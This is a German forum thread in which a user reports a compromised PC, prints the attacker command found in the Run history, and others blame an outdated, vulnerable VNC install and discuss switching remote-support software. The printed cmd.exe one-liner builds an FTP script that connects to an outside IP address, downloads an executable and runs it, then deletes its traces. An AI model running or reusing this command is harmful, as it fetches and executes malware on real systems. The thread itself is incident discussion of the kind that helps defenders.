unter ausfĂĽhren fand sich dann folgendes
- Code: Alles auswählen
cmd.exe /c del i&echo open 85.119.186.43 2876 > i&echo user 1 1 >> i &echo get 485.exe >> i &echo quit >> i &ftp -n -s:i &485.exe&del i&exit
cmd.exe /c del i&echo open 85.119.186.43 2876 > i&echo user 1 1 >> i &echo get 485.exe >> i &echo quit >> i &ftp -n -s:i &485.exe&del i&exit
Was sagt ein Virenscan zu dieser Datei?s hat geschrieben:auf die nachfrage ob er "spinnt irgendwie" genauer definieren kann meinte er das sich fenster öffnen/schließen und immer wieder was von selbst geschrieben wird...
s hat geschrieben:auf die nachfrage ob er "spinnt irgendwie" genauer definieren kann meinte er das sich fenster öffnen/schließen und immer wieder was von selbst geschrieben wird...
lordpeng hat geschrieben:>bei mir war eine alte vnc version schuld, die eine sicherheitslĂĽcke hat und anscheinend
das vnc nicht sonderlich sicher ist, is leider nix neues, drum verwend ich es schon lang nimmer fĂĽr fernwartungszwecke
Es ist zwar praktisch, bereitet aber auch wie gesehen viele Probleme.lordpeng hat geschrieben:>bei mir war eine alte vnc version schuld, die eine sicherheitslĂĽcke hat und anscheinend
das vnc nicht sonderlich sicher ist, is leider nix neues, drum verwend ich es schon lang nimmer fĂĽr fernwartungszwecke
lordpeng hat geschrieben:auf netop umgestellt, hat zwar auch ein paar macken
Ich glaube das liegt wie bei vielen anderen Dingen(Telnet,.......) daran, wann es entwickelt wurde. Da waren die Dinge die heute die heute Probleme bereiten einfach noch kein Problem.lordpeng hat geschrieben:>Es ist zwar praktisch, bereitet aber auch wie gesehen viele Probleme.
unsere kunden werden nach und nach auf netop umgestellt, hat zwar auch ein paar macken, aber sicherheitsprobleme gibts da eher ned und von der performance isses wesentlich besser als pcanywhere und vnc ...
Mitglieder in diesem Forum: 0 Mitglieder und 6 Gäste